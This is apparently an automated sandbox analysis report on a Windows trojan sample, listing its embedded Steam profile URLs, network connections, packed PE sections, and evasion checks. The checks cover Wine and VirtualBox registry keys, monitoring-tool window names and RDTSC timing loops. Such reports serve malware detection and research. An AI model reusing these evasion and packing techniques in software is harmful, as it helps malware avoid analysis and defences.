    Source: file.exe, 00000000.00000003.2071960309.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071750566.0000000000B60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/Z~
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082239290.0000000000BE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082239290.0000000000BE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082239290.0000000000BE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082239290.0000000000BE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
    Source: file.exe, 00000000.00000003.2071960309.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071750566.0000000000B60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071750566.0000000000B48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082239290.0000000000BE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
    Source: file.exe, 00000000.00000003.2082239290.0000000000BE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
    Source: file.exe, 00000000.00000003.2082239290.0000000000BE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082239290.0000000000BE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071750566.0000000000B48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082239290.0000000000BE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082239290.0000000000BE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082239290.0000000000BE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
    Source: file.exe, 00000000.00000003.2071750566.0000000000B95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2071715008.0000000000BD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
    Source: file.exe, 00000000.00000003.2071750566.0000000000B95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-m
    Source: file.exe, 00000000.00000003.2071715008.0000000000BD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
    Source: file.exe, 00000000.00000003.2071715008.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49704 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49705 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49706 version: TLS 1.2

    System Summary

    barindex
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: .rsrc
    Source: file.exeStatic PE information: section name: .idata
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A02280_2_001A0228
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A20300_2_001A2030
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0019A8500_2_0019A850
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001CE8A00_2_001CE8A0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001DA0D00_2_001DA0D0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001951600_2_00195160
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0019E1A00_2_0019E1A0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D4A400_2_001D4A40
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0019A3000_2_0019A300
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001BC4700_2_001BC470
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A049B0_2_001A049B
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A44870_2_001A4487
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00197CA40_2_00197CA4
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001BCCD00_2_001BCCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001BFD100_2_001BFD10
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001985900_2_00198590
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001935B00_2_001935B0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001AC5F00_2_001AC5F0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A6EBF0_2_001A6EBF
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0019BEB00_2_0019BEB0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0019AF100_2_0019AF10
    Source: C:\Users\user\Desktop\file.exeCode function: String function: 001AD300 appears 47 times
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 1924
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: file.exeStatic PE information: Section: ZLIB complexity 0.9995165532178217
    Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
    Source: classification engineClassification label: mal100.troj.evad.winEXE@3/9@10/2
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5256
    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\df66ec69-376e-43a9-84ae-1ab6d8118e0dJump to behavior
    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 1924
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 1060
    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: file.exeStatic file information: File size 2960896 > 1048576
    Source: file.exeStatic PE information: Raw size of eypfpszy is bigger than: 0x100000 < 0x2a9600

    Data Obfuscation

    barindex
    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.190000.0.unpack :EW;.rsrc :W;.idata :W;eypfpszy:EW;lshfcwfx:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;eypfpszy:EW;lshfcwfx:EW;.taggant:EW;
    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
    Source: file.exeStatic PE information: real checksum: 0x2db5dc should be: 0x2e2478
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: .rsrc
    Source: file.exeStatic PE information: section name: .idata
    Source: file.exeStatic PE information: section name: eypfpszy
    Source: file.exeStatic PE information: section name: lshfcwfx
    Source: file.exeStatic PE information: section name: .taggant
    Source: file.exeStatic PE information: section name: entropy: 7.978527192652883

    Boot Survival

    barindex
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 370FF0 second address: 370FF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35E77E second address: 35E782 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35E782 second address: 35E7A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F18F0E36A58h 0x0000000c ja 00007F18F0E36A46h 0x00000012 pop eax 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3704E6 second address: 3704EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3704EA second address: 37053A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F18F0E36A53h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d js 00007F18F0E36A54h 0x00000013 jmp 00007F18F0E36A4Ch 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c je 00007F18F0E36A46h 0x00000022 jmp 00007F18F0E36A59h 0x00000027 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37053A second address: 37053E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37053E second address: 370570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F18F0E36A59h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F18F0E36A51h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3706CB second address: 3706CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3706CF second address: 3706D9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3706D9 second address: 3706DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 370892 second address: 3708A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F18F0E36A4Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
